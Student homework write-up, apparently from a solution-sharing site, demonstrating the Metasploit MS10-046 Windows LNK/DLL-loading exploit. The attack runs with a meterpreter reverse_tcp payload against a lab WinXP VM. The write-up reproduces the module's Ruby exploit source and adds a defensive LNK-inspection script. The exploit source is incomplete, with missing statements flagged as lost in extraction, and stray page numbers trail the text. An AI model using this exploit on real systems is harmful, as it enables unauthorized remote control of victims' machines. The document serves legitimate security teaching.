[SOLVED] Excel solution


Homework #3
In this homework you will pick a metasploit module and demonstrate how to use it to gain
access to your WinXP VM instance. You should use the ONL topology for this homework.

In class, we used the ms_03_026_dcom module; you must choose a different one for this
homework. Similarly, the Metasploit Unleashed tutorial uses ms08_067_netapi; so that one
cannot be used either. Other than these constraints, you are free to choose any module so long
as you are able to demonstrate that it can be used to (at a minimum) open a meterpreter
session on your WinXP VM instance.

For your write-up and turn-in document, make a copy of this document, rename it to hw3-notes, and move it into your CSE 523 Google Docs collection. Use this document to complete the homework, using the space provided below.

You are to complete this homework on your own. Do not ask (or answer) questions of other
students; do not discuss any aspect of this homework with any other student. Direct all
questions to the TAs or me.

Your complete homework should include the following.

An annotated transcript illustrating how to use your module of choice; include at least one screenshot at the end to demonstrate that it worked. Your transcript should be clear and easy for someone to reproduce; you can assume that a reader has the same Ubuntu/WinXP setup that you do. Your annotated transcript should be as easy to follow as exploring-msploit-notes. (You do not need to include gates.)

Identify and briefly describe the vulnerability that is being exploited with this module. Add links to the appropriate CVE and MS bulletins.

Find the ruby source code for the exploit module. Include both the URL to the source file at github and a copy of the ruby source code in your write-up.

Your writeup should be organized and well-written, with proper grammar and spelling.

Do not change anything above this line. Add your homework write-up below it.

Exploit Steps

Open msfconsole

https://github.com/rapid7/metasploit-framework

Exploit settings

I set ms10_046_shortcut_icon_dllloader as the exploit module to use, then set reverse_tcp as the payload.

This module starts a web server, so the address it listens on has to be given with SRVHOST. I also set LHOST, the address of the host running Metasploit, which the reverse_tcp payload connects back to. Then I used show options to check the settings.

Exploit

Use the exploit command to launch the exploit.

Once the exploit command runs, the server is up. When the client accesses the URL, the server sends it the malicious DLL.

Access URL in the winxp

In the WinXP VM, open IE, enter the URL and press Enter.

Open Meterpreter Session

When the victim client accesses the URL, the server (which the module runs as a WebDAV service) sends the malicious DLL to the client. The exploit succeeds and a meterpreter session opens.

Start Interaction with the meterpreter session

Now I can access the WinXP system from the meterpreter session. The following shows that I cd to the C: directory, list the files in it and read the content of info.txt.

The following shows that I can download a file and start a program.

Vulnerability Discussion

This module exploits the vulnerability described at https://www.symantec.com/security_response/vulnerability.jsp?bid=41732 (CVE-2010-2568, Microsoft bulletin MS10-046, as listed in the module's references below). In summary, the module serves a shortcut (.LNK) file whose icon points to a malicious DLL. The WinXP system has a flaw in how it handles such shortcuts: Windows loads the referenced DLL automatically when it renders the shortcut's icon, which lets the module run its payload.

Module Source Code

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows Shell LNK Code Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the handling of Windows
        Shortcut files (.LNK) that contain an icon resource pointing to a
        malicious DLL. This module creates a WebDAV service that can be used
        to run an arbitrary payload when accessed as a UNC path.
      },
      'Author'         =>
        [
          'hdm',    # Module itself
          'jduck',  # WebDAV implementation, UNCHOST var
          'B_H'     # Clean LNK template
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-2568' ],
          [ 'OSVDB', '66387' ],
          [ 'MSB', 'MS10-046' ],
          [ 'URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space' => 2048,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'DisclosureDate' => 'Jul 16 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT',   [ true, "The daemon port to listen on (do not change)", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use (do not change).", "/" ]),
        OptString.new('UNCHOST', [ false, "The host portion of the UNC path to provide to clients (ex: 1.2.3.4)." ])
      ])

    deregister_options('SSL', 'SSLVersion') # Just for now
  end

  def on_request_uri(cli, request)
    case request.method
    when 'OPTIONS'
      process_options(cli, request)
    when 'PROPFIND'
      process_propfind(cli, request)
    when 'GET'
      process_get(cli, request)
    else
      print_error("Unexpected request method encountered: #{request.method}")
      resp = create_response(404, "Not Found")
      resp.body = ""
      resp['Content-Type'] = 'text/html'
      cli.send_response(resp)
    end
  end

  def process_get(cli, request)
    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    webdav = "\\\\#{myhost}\\"

    if (request.uri =~ /\.dll$/i)
      print_status "Sending DLL payload"
      return if ((p = regenerate_payload(cli)) == nil)
      data = generate_payload_dll({ :code => p.encoded })
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    if (request.uri =~ /\.lnk$/i)
      print_status "Sending LNK file"
      # NOTE: the statement that assigns `data` here did not survive extraction;
      # see the module source at the URL above.
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    print_status "Sending UNC redirect"
    resp = create_response(200, "OK")
    # NOTE: the HTML body (the redirect to the UNC path held in `webdav`) was
    # stripped in extraction.
    resp.body = %Q||
    resp['Content-Type'] = 'text/html'
    cli.send_response(resp)
  end

  #
  # OPTIONS requests sent by the WebDav Mini-Redirector
  #
  def process_options(cli, request)
    print_status("Responding to WebDAV OPTIONS request")
    headers = {
      'MS-Author-Via' => 'DAV',
      # 'DASL'        => '',
      # 'DAV'         => '1, 2',
      'Allow'         => 'OPTIONS, GET, PROPFIND',
      'Public'        => 'OPTIONS, GET, PROPFIND'
    }
    resp = create_response(207, "Multi-Status")
    resp.body = ""
    resp['Content-Type'] = 'text/xml'
    cli.send_response(resp)
  end

  #
  # PROPFIND requests sent by the WebDav Mini-Redirector
  #
  def process_propfind(cli, request)
    path = request.uri
    print_status("Received WebDAV PROPFIND request for #{path}")
    body = ""

    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    my_uri  = "http://#{my_host}/"

    # NOTE: in every %Q|...| body below, the WebDAV XML elements that wrapped
    # these values were lost in extraction; only the interpolated values remain.

    if path =~ /\.dll$/i
      # Response for the DLL
      print_status("Sending DLL multistatus for #{path}")
      body = %Q|
#{path}#{@exploit_dll}
2010-07-19T20:29:42Z
#{rand(0x100000)+128000}
Mon, 19 Jul 2010 20:29:42 GMT
#{"%.16x" % rand(0x100000000)}
T
application/octet-stream
HTTP/1.1 200 OK
|
      resp = create_response(207, "Multi-Status")
      resp.body = body
      resp['Content-Type'] = 'text/xml'
      cli.send_response(resp)
      return
    end

    if path =~ /\.lnk$/i
      # Response for the LNK
      print_status("Sending LNK multistatus for #{path}")
      body = %Q|
#{path}#{@exploit_lnk}
2010-07-19T20:29:42Z
#{rand(0x100)+128}
Mon, 19 Jul 2010 20:29:42 GMT
#{"%.16x" % rand(0x100000000)}
T
shortcut
HTTP/1.1 200 OK
|
      resp = create_response(207, "Multi-Status")
      resp.body = body
      resp['Content-Type'] = 'text/xml'
      cli.send_response(resp)
      return
    end

    if path !~ /\/$/
      if path.index('.')
        print_status("Sending 404 for #{path}")
        resp = create_response(404, "Not Found")
        resp['Content-Type'] = 'text/html'
        cli.send_response(resp)
        return
      else
        print_status("Sending 301 for #{path}")
        resp = create_response(301, "Moved")
        resp['Location'] = path + "/"
        resp['Content-Type'] = 'text/html'
        cli.send_response(resp)
        return
      end
    end

    print_status("Sending directory multistatus for #{path}")
    body = %Q|
#{path}
2010-07-19T20:29:42Z
Mon, 19 Jul 2010 20:29:42 GMT
#{"%.16x" % rand(0x100000000)}
httpd/unix-directory
HTTP/1.1 200 OK
|

    subdirectory = %Q|
#{path}#{Rex::Text.rand_text_alpha(6)}/
2010-07-19T20:29:42Z
Mon, 19 Jul 2010 20:29:42 GMT
#{"%.16x" % rand(0x100000000)}
httpd/unix-directory
HTTP/1.1 200 OK
|

    files = %Q|
#{path}#{@exploit_dll}
2010-07-19T20:29:42Z
#{rand(0x100000)+128000}
Mon, 19 Jul 2010 20:29:42 GMT
#{"%.16x" % rand(0x100000000)}
T
application/octet-stream
HTTP/1.1 200 OK
#{path}#{@exploit_lnk}
2010-07-19T20:29:42Z
#{rand(0x100)+128}
Mon, 19 Jul 2010 20:29:42 GMT
#{"%.16x" % rand(0x100000000)}
T
shortcut
HTTP/1.1 200 OK
|

    if request['Depth'].to_i > 0
      if path.scan(/\//).length < 2
        body << subdirectory
      else
        body << files
      end
    end
    body << "" # the closing XML element appended here was lost in extraction

    body.gsub!(/\t/, '')

    # send the response
    resp = create_response(207, "Multi-Status")
    resp.body = body
    resp['Content-Type'] = 'text/xml; charset=utf8'
    cli.send_response(resp)
  end

  def generate_link(unc)
    uni_unc = unc.unpack('C*').pack('v*')
    path = ""
    path << [
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x6a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    ].pack('C*')
    path << uni_unc

    # LinkHeader (76 bytes; the trailing fields are all zero)
    ret = ([
      0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00,
      0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00
    ] + [0x00] * 52).pack('C*')

    idlist_data = ""
    idlist_data << [0x12 + 2].pack('v')
    idlist_data << [
      0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69,
      0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d
    ].pack('C*')
    idlist_data << [0x12 + 2].pack('v')
    idlist_data << [
      0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69,
      0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d
    ].pack('C*')
    idlist_data << [path.length + 2].pack('v')
    idlist_data << path
    idlist_data << [0x00].pack('v') # TERMINAL WOO

    # LinkTargetIDList
    ret << [idlist_data.length].pack('v') # IDListSize
    ret << idlist_data

    # ExtraData blocks (none)
    ret << [rand(4)].pack('V')

    # Patch in the LinkFlags (HasLinkTargetIDList | IsUnicode)
    ret[0x14, 4] = ["10000001000000000000000000000000".to_i(2)].pack('N')

    ret
  end

  def exploit
    unc = "\\\\"
    if (datastore['UNCHOST'])
      unc << datastore['UNCHOST'].dup
    else
      unc << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
    end
    unc << "\\"
    unc << rand_text_alpha(rand(8)+4)
    unc << "\\"

    @exploit_unc = unc
    @exploit_lnk = rand_text_alpha(rand(8)+4) + ".lnk"
    @exploit_dll = rand_text_alpha(rand(8)+4) + ".dll"

    if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != "/"
      fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
    end

    print_status("Send vulnerable clients to #{@exploit_unc}.")
    # NOTE: the angle-bracket placeholders between the slashes of this URL were
    # stripped in extraction.
    print_status("Or, get clients to save and render the icon of http:///.lnk")

    super
  end
end
```
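As an added, detection-side example (my code, not part of the write-up or of the Metasploit module), the following Ruby inspector parses the 76-byte ShellLinkHeader and the LinkTargetIDList of a .LNK file and reports any ItemID whose data embeds a UTF-16LE UNC path ending in .dll, which is the layout generate_link above writes into the shortcut. The test fixture it builds is constructed for this example and uses the documentation address 203.0.113.10; it is not a real exploit file.

```ruby
# Added example: a ShellLink (.LNK) inspector that flags UNC .dll targets.
LNK_CLSID = [0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
             0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46].pack('C*')
HAS_LINK_TARGET_ID_LIST = 0x01 # LinkFlags bit 0
IS_UNICODE              = 0x80 # LinkFlags bit 7
UNC_DLL = /\\\\[^\u0000\\]+\\[^\u0000]*?\.dll\b/i

# Returns { flags:, items: } (items = raw ItemID data) or nil if not a ShellLink.
def parse_lnk(data)
  data = data.b
  return nil if data.bytesize < 0x4c || data[0, 4].unpack1('V') != 0x4c
  return nil if data[4, 16] != LNK_CLSID
  flags = data[0x14, 4].unpack1('V')
  items = []
  if (flags & HAS_LINK_TARGET_ID_LIST) != 0 && data.bytesize >= 0x4e
    stop = [0x4e + data[0x4c, 2].unpack1('v'), data.bytesize].min
    pos = 0x4e
    while pos + 2 <= stop
      size = data[pos, 2].unpack1('v')
      break if size < 2 || pos + size > stop # TerminalID (size 0) or truncated item
      items << data[pos + 2, size - 2]
      pos += size
    end
  end
  { flags: flags, items: items }
end

# UNC .dll targets found in any ItemID, decoded as UTF-16LE (IsUnicode shortcuts).
def suspicious_unc_dll_targets(data)
  parsed = parse_lnk(data)
  return [] unless parsed
  parsed[:items].flat_map do |item|
    even = item[0, item.bytesize & ~1] # drop a dangling odd byte
    even.force_encoding('UTF-16LE').encode('UTF-8', invalid: :replace, undef: :replace).scan(UNC_DLL)
  end.uniq
end

# Constructed test fixture (not a real exploit file): a header with
# HasLinkTargetIDList|IsUnicode and a single ItemID carrying a UTF-16LE path.
def build_fixture(target)
  header = [0x4c].pack('V') + LNK_CLSID +
           [HAS_LINK_TARGET_ID_LIST | IS_UNICODE].pack('V') + ("\x00" * 52).b
  item   = target.encode('UTF-16LE').b
  idlist = [item.bytesize + 2].pack('v') + item + [0].pack('v')
  header + [idlist.bytesize].pack('v') + idlist
end
```

Run `suspicious_unc_dll_targets(File.binread(path))` over a shortcut to get the list of UNC .dll references it carries; an empty list for `build_fixture("C:\\Windows\\notepad.exe")` shows that ordinary local targets are not flagged.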

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

440

441

442

443
